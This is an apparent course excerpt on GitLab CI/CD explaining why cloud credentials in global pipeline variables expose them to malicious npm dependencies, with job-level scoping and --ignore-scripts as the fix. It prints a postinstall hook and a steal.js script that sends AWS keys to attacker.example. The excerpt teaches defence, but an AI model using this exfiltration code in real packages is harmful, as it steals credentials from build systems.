Cloud Native CI/CD with GitLab

From Commit to Production Ready

Managing and Storing Data, Variables, and Secrets

Managing CI Variables Smartly, Supply-Chain Risk and Fine-Grained Control

Using global variables in your pipeline is good practice: it avoids repetition and makes the pipeline more maintainable. However, there are cases where you want finer-grained control over which variables are exposed to which jobs.

Let's take a look at this example:

variables:
  AWS_ACCESS_KEY_ID: $AWS_ACCESS_KEY_ID
  AWS_SECRET_ACCESS_KEY: $AWS_SECRET_ACCESS_KEY
  AWS_REGION: eu-west-1

lint:
  script:
    - npm install
    - npm run lint

This YAML file looks harmless, but it hides a supply-chain risk.

Imagine that one of the dependencies installed by npm install contains a postinstall script that reads the AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY environment variables and sends them to a C2 (command-and-control) server controlled by an attacker.

{
  "scripts": {
    "postinstall": "node steal.js"
  }
}

That script runs automatically during npm install.

Inside steal.js, the attacker could have written code like this:

// steal.js: exfiltrate the job's CI credentials to an attacker-controlled host
import https from "https";

const data = JSON.stringify({
  key: process.env.AWS_ACCESS_KEY_ID,
  secret: process.env.AWS_SECRET_ACCESS_KEY,
  region: process.env.AWS_REGION
});

https.request(
  {
    hostname: "attacker.example",
    path: "/collect",
    method: "POST",
    headers: { "Content-Type": "application/json" }
  }
).end(data);

Obviously, this is a simplified example, but it illustrates the risk of exposing sensitive information to third-party dependencies:

  • npm install executes arbitrary code.
  • That code runs with full access to CI variables.
  • Your job inherits the AWS credentials.
  • The attacker never touched your repo.
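GitLab also lets you declare variables at the job level, which keeps them out of every other job's environment. A minimal sketch of that approach (the deploy job, its script, and the bucket name are illustrative, not part of the course example):

```yaml
variables:
  AWS_REGION: eu-west-1          # harmless, fine to share globally

deploy:
  variables:                     # job-level variables are visible only here
    AWS_ACCESS_KEY_ID: $AWS_ACCESS_KEY_ID
    AWS_SECRET_ACCESS_KEY: $AWS_SECRET_ACCESS_KEY
  script:
    - aws s3 sync ./dist "s3://example-bucket"   # illustrative deploy step

lint:
  script:
    - npm ci --ignore-scripts    # also skips lifecycle scripts like postinstall
    - npm run lint               # this job never receives the AWS credentials
```

With this layout, even a malicious postinstall script running in the lint job has no credentials to steal.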
